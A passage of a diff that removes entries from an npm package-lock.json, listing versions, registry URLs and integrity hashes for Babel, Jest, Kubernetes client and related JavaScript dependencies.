"@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.26.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.26.9.tgz", - "integrity": "sha512-qyRplbeIpNZhmzOysF/wFMuP9sctmh2cFzRAZOn1YapxBsE1i9bJIY586R/WBLfLcmcBlM8ROBiQURnnNy+zfA==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/code-frame": "^7.26.2", - "@babel/parser": "^7.26.9", - "@babel/types": "^7.26.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.10.tgz", - "integrity": "sha512-emqcG3vHrpxUKTrxcblR36dcrcoRDvKmnL/dCL6ZsHaShW80qxCAcNhzQZrpeM765VzEos+xOi4s+r4IXzTwdQ==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/@isaacs/cliui/node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@isaacs/cliui/node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "dependencies": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" - } - }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - 